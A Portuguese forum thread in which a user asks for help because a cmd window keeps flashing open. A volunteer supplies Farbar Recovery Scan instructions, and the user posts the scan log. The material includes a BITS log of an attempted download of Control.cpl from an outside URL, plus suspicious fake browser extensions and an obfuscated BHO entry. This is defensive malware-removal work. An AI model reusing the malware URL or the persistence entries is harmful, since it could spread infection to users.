Ir ao conteúdo
  • Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
Murilo Beraldo

CMD abre e fecha sozinho de tempos em tempos

Recommended Posts

Olá a todos.

 

Há alguns anos atrás eu enfrentei este mesmo problema e pensei ter sido resolvido.

 

 

Acontece que de uns tempos pra cá este mesmo problema voltou.

 

O que acontece exatamente:

 

1. Estou usando o computador normalmente, navegando, trabalhando ou jogando alguma coisa

2. Cmd abre por uns 2 segundos e fecha automaticamente. Algumas vezes permanece aberto com o seguinte log:

 

DISPLAY: 'My' TYPE: DOWNLOAD STATE: TRANSIENT_ERROR
PRIORITY: HIGH FILES: 0 / 1 BYTES: 0 / UNKNOWN
ERROR FILE:   http://www.dicasimpressao.esy.es/FE-1.0.0.0/Control.cpl -> C:\Users\A\AppData\Roaming\Microsoft\Control.cpl
ERROR CODE:    0x80072ee7 - O nome ou o endereço do servidor não pôde ser resolvido
ERROR CONTEXT: 0x00000005 - O erro ocorreu durante o processamento do arquivo remoto.
 

 

3. Em 60-90 segundos depois abre novamente uma janela do cmd que tambem abre e fecha, porém mais rapidamente. Não consegui pegar o que está escrito nela.

 

 

Parece que o computador tenta acessar um arquivo remoto?

 

Já tentei várias coisas ao longo dos anos. Não sei ao certo como prosseguir.

 

Alguem tem alguma ideia do que posso fazer?

 

Estou pensando em formatar o PC de vez...

 

Muito obrigado!

 

Murilo Beraldo

 

 

 

 

 

 

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Murilo Beraldo

 

Por favor, atente para o seguinte:

  • Sobre o Fórum: Este é um espaço privado, não público. Seu uso é um privilégio, não um direito;
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • IMPORTANTE: Caso tenha programas de ativação do windows ou de compartilhamento de torrent, sugiro desinstalar. Só irei dar procedimento na analise após a remoção. Regras do forum;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Respeite a ordem das instruções passadas;
  • Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!

Baixe o Farbar Recovery Scan do link abaixo e salve na sua área de trabalho.


NOTA: Faça o download de acordo com sua arquitetura (32 bits ou 64 bits)
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/

** Usuários do Windows Vista, Windows 7, 8/8.1 e windows 10:
Clique com o direito sobre o arquivo FRST64.EXE, depois clique em VRIfczU.png .
Aceite o contrato e depois clique no botão Scan.

Aguarde e ao final, os logs FRST.txt e Addition.txt serão salvos no seu desktop.

Selecione, copie e cole o conteúdo do FRST.txt em sua próxima resposta e anexe o Addition.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites
  • Autor do tópico
  • Ola. Aqui está.

     

    Obrigado!

     

    Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 14-09-2017 01
    Executado por A (administrador) em LUCAS-PC (14-09-2017 21:27:03)
    Executando a partir de C:\Users\A\Desktop
    Perfis Carregados: A (Perfis Disponíveis: A)
    Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Português (Brasil)
    Internet Explorer Versão 11 (Navegador padrão: Chrome)
    Modo da Inicialização: Normal
    Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processos (Whitelisted) =================

    (Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

    (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
    (Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
    (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe
    (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (Microsoft Corporation) C:\Windows\System32\bitsadmin.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

    ==================== Registro (Whitelisted) ====================

    (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13530184 2013-04-22] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-04-11] (Intel Corporation)
    HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
    HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-02-21] (Intel Corporation)
    HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [1871344 2017-08-10] (Adobe Systems Inc.)
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [Akamai NetSession Interface] => C:\Users\A\AppData\Local\Akamai\netsession_win.exe [4673432 2014-10-29] (Akamai Technologies, Inc.)
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [AdobeBridge] => [X]
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8722136 2016-06-01] (Piriform Ltd)
    Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll

    ==================== Internet (Whitelisted) ====================

    (Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

    Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 201.6.2.93 201.6.2.119
    Tcpip\..\Interfaces\{61404789-C97D-4202-8464-A9A596FC93CD}: [NameServer] 8.8.8.8
    Tcpip\..\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D}: [DhcpNameServer] 201.6.2.93 201.6.2.119

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-21-1444981709-1690395092-1683229413-1000 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
    BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: Sem Nome -> {6F83220D-2200-1287-2249-17574CA92DB0}22202F76204E6F4578706C6F726572202F74205245475F44574F5244202F642031202F66 -> Nenhum Arquivo
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-26] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM - avast! WebRep - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  Nenhum Arquivo
    Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    Handler: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} -  Nenhum Arquivo

    FireFox:
    ========
    FF ProfilePath: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default [2017-09-14]
    FF DefaultSearchEngine: Mozilla\Firefox\Profiles\j167jror.default -> Google (avast)
    FF Homepage: Mozilla\Firefox\Profiles\j167jror.default -> about:home
    FF SearchPlugin: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\searchplugins\google-avast.xml [2014-12-05]
    FF HKLM-x32\...\Firefox\Extensions: [amizade@technet.com] - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi
    FF Extension: (Mozilla Firefox Security) - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi [2014-12-04] [não assinado]
    FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.15@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn
    FF Extension: (Adobe Acrobat DC - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn [2017-04-27]
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E886D}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\cef\xpi => não encontrado (a)
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E8874}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\abn\xpi => não encontrado (a)
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\buscape.xml [2015-05-07]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mercadolivre.xml [2015-05-07]
    FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_26_0_0_151.dll [2017-08-12] ()
    FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-03-27] (Adobe Systems)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_151.dll [2017-08-12] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
    FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2017-08-10] (Adobe Systems Inc.)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-03-27] (Adobe Systems)
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/abn -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_abn.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef64 -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)

    Chrome: 
    =======
    CHR DefaultProfile: Default
    CHR StartupUrls: Default -> "hxxp://www.hotmail.com/"
    CHR Profile: C:\Users\A\AppData\Local\Google\Chrome\User Data\Default [2017-09-14]
    CHR Extension: (Google Apresentações) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-03]
    CHR Extension: (Google Docs) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-03]
    CHR Extension: (Google Drive) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
    CHR Extension: (YouTube) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Google Search) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-08-04]
    CHR Extension: (Planilhas do Google) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-03]
    CHR Extension: (Documentos Google off-line) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
    CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
    CHR Extension: (GBBD Caixa Economica Federal) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcaplhfkihhldmlbjhgajdeghjdbffi [2015-01-24]
    CHR Extension: (Gmail) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-27]
    CHR Extension: (Chrome Media Router) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-15]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Google [2015-01-28]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Microsoft\Console\Application\Google\Update\0315 [2015-03-15]
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Serviços (Whitelisted) ====================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

    S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [771672 2017-03-14] (Adobe Systems Incorporated)
    S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
    S4 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] ()
    S4 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [445976 2016-08-03] (BlueStack Systems, Inc.)
    S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [425496 2016-08-03] (BlueStack Systems, Inc.)
    S4 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [462360 2016-08-03] (BlueStack Systems, Inc.)
    S4 Ds3Service; E:\Arquivos de Programas\Scarlet.Crush Productions\bin\ScpService.exe [381952 2014-04-02] (Scarlet.Crush Productions) [Arquivo não assinado]
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-04-11] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel(R) Corporation) [Arquivo não assinado]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel(R) Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-21] (Malwarebytes)
    R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [Arquivo não assinado]
    S4 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG)
    S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    S4 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-18] (NVIDIA Corporation)
    S4 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [450168 2017-06-21] (NVIDIA Corporation)
    S4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-02-22] (Electronic Arts)
    S4 RoxMediaDBGame1X; C:\Program Files (x86)\Common Files\Roxio Shared\Game1X\SharedCOM\RoxMediaDBGame1X.exe [1096424 2014-07-09] (Corel Corporation)
    S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [137216 2016-03-29] (Microsoft Corporation) [Arquivo não assinado]
    S3 VsEtwService120; C:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [87728 2013-10-04] (Microsoft Corporation)
    S3 VSStandardCollectorService140; E:\Arquivos de Programas\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation)
    R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
    S4 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [627992 2014-01-13] (Wacom Technology, Corp.)
    S2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [X]

    ===================== Drivers (Whitelisted) ======================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

    R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2016-08-03] (BlueStack Systems)
    R2 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [307768 2016-07-28] (Bluestack System Inc. )
    S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-01-15] (Disc Soft Ltd)
    S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-01-15] (Disc Soft Ltd)
    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-08-24] ()
    S3 H5xUSB; C:\Windows\System32\Drivers\uth5x64.sys [109568 2014-07-24] (UT)
    R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-04-11] (Intel Corporation)
    R4 IOMap; C:\Windows\system32\drivers\IOMap64.sys [23680 2013-01-25] (ASUSTeK Computer Inc.)
    R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [192960 2017-09-12] (Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [101824 2017-09-14] (Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-09-14] (Malwarebytes)
    R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [253888 2017-09-14] (Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-09-14] (Malwarebytes)
    R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [129312 2014-09-30] (Intel Corporation)
    S3 MotioninJoyXFilter; C:\Windows\System32\DRIVERS\MijXfilt.sys [115272 2015-01-08] (MotioninJoy) [Arquivo não assinado]
    S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30328 2017-06-21] (NVIDIA Corporation)
    R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [48248 2017-06-21] (NVIDIA Corporation)
    R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-05-03] (NVIDIA Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-07-10] (Corel Corporation)
